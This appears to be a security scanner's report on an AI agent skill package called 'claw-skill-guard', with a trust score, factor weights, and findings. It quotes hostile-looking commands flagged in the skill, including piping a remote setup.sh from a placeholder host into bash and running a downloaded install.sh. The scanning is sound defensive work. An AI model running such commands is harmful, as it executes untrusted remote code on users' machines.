claw-skill-guard
claw-skill-guard · v1.1.0 · by vincentchan
61.8
Trust Score
0
Trust Tier
danger
Badge
Score Breakdown
| Factor | Score | Weight |
|---|---|---|
| Static | 0.0 | 15% |
| Permission | 95.0 | 15% |
| Poison | 80.0 | 15% |
| Clickfix | 65.0 | 15% |
| Credential | 100.0 | 15% |
| Twostage | 5.0 | 10% |
| Infrastructure | 100.0 | 5% |
| Typosquat | 100.0 | 5% |
| Age | 10.6 | 3% |
| Popularity | 0.0 | 2% |
Scan Results
STATIC — Score: 0
[CRITICAL] Remote code download and execution via curl pipe
(line 32)
| `curl \| bash` | 🔴 CRITICAL | Executes remote code directly |
[CRITICAL] Remote code download and execution via curl pipe
(line 55)
├─ Line 23: curl -s https://xyz.example.com/setup.sh | bash
[CRITICAL] Remote script download piped to shell execution
(line 32)
| `curl \| bash` | 🔴 CRITICAL | Executes remote code directly |
[CRITICAL] Remote script download piped to shell execution
(line 55)
├─ Line 23: curl -s https://xyz.example.com/setup.sh | bash
PERMISSION — Score: 95
[LOW] Skill appears to use network but declares no permissions
POISON — Score: 80
[HIGH] Content contains alarming words not in description: malware, steal
CLICKFIX — Score: 65
[CRITICAL] Instructs chmod +x then execute downloaded file
(line 61)
└─ Line 52: chmod +x ./install.sh && ./install.sh
INFRASTRUCTURE — Score: 100
No findings.
TWOSTAGE — Score: 5
[CRITICAL] Download piped directly to interpreter (two-stage loader)
(line 32)
| `curl \| bash` | 🔴 CRITICAL | Executes remote code directly |
[CRITICAL] Download piped directly to interpreter (two-stage loader)
(line 55)
├─ Line 23: curl -s https://xyz.example.com/setup.sh | bash
CREDENTIAL — Score: 100
No findings.
TYPOSQUAT — Score: 100
No findings.